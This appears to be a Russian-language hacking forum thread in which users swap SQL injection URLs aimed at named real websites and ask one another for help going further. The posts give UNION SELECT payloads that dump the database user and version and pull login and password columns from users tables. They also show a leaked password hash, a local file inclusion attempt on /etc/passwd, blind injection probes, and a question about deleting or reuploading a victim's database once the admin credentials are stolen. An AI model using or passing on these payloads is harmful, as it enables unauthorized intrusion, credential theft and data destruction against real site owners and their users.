Code: http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5,6,7,8,9,0/* Помогите новичку дальше незнаю что делать
_http://www.safelider.ru/view.php?item=-2877+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,login,password),9,0+from+users/* HTML: Table [banners] Table [catalog] Table [catalog_picture] Table [catalog_struct] Table [catalog_text] Table [db_pics] Table [feature_bind] Table [feature_group] Table [feature_type] Table [fotobank] Table [invoice] Table [link_catalog] Table [manufactures] Table [news] Table [pages] Table [pricelist] Table [tovar] Table [users]
?item=-1+union+select+1,2,concat_ws(char(58),user(),database(),version()),4,5,6,7,8,9,0/* user: [email protected] database: u13238_2 version: 5.0.45-log подбирай таблици..
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а можно отсюдова файлы посмотреть?
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(co ncat(version(),char(58),user()))),6,7,8,9/* а как не локальный сервер получить майсикьюла пробывал некоторые значения не прокатило*?
Вот он мне выдаёт 4 версия 4.1.9|используемая база db2255b| на запрос пасса 606717756665bce6|юзер us2255a@localhost 6, Хитрый Чен=))
Ситуация: Откопал кем-то залитый ремвью на кажись польский сайт. получил доступ к базе. Прав на запись нету. Есть логин\пасс админа, правда чет не заходит может не туда ввожу, сайт-то польский. Что можно сделать кроме как удалить\перезалить базу?
при запросе id=2' получаю сообщение DBI debuging message / Отладочное сообщение DBI Error / Ошибка Could not Parse Query Query / Запрос select id,one,name from pb_portal where id=2\' Description / Описание You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 там как я понял фильтрация какаято, хелп http://www.paintball.ru/next.php?id=2'
скажите как называется таблица с "солью" в новых версиях и где она лежит? и подскажите плиз какого вида функция шифровки пароля в ИПБ-формух?
И ещё подскажите. Вот ситуация: Есть локальный инклуд. логов не нашёл. На поддомене есть форум. адресв вида: forum.site.ru и есть возможность туда загружать файлы. Но вот проблема: я не знаю как прописать путь до форума! Если ИП адрес их отличается - это значит что они на разных компах? (205.222.222.123 и 205.222.222.124) site.ru/forum/ не катит =( site.ru/ins.php?inc=../../../etc/passwd%00 кто что думает по данному поводу?
SQL Databases пробуй httpd.conf поискать... https://forum.antichat.ru/showthread.php?t=30632 не обязательно...
что тут можно зделать ? и вот тут а также здесь знаю что юнион использовать нельзя.. но все же.. netframework - хз как разкрутить.. SVAROG баян..
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+select+1,2,3,4,unhex(hex(concat(version(),database(),password(0),user()))),6,7,8,9/* кто знает как тут нарыть удалённый адрес для БД
2 sabe http://interfilm.ru/takelogin.php Пишет что нет коннекта с базой, что ты хочешь от него Сдесь пятая ветка без вывода,подзапросы: http://www.photodom.com/ru/catalog.php?page=0&id=9)+and+substring(version(),1,1)=5/* Сдесь лимит после ордер влиять на запрос можно только подставляя 2-е значение лимита: http://www.aldebaran.ru/gb/index.php?entry=25,1/* тоесть никак это ошибка введённых данных использовать можно только расскрытие пути http://zman.com/news/category.aspx?CategoryId=20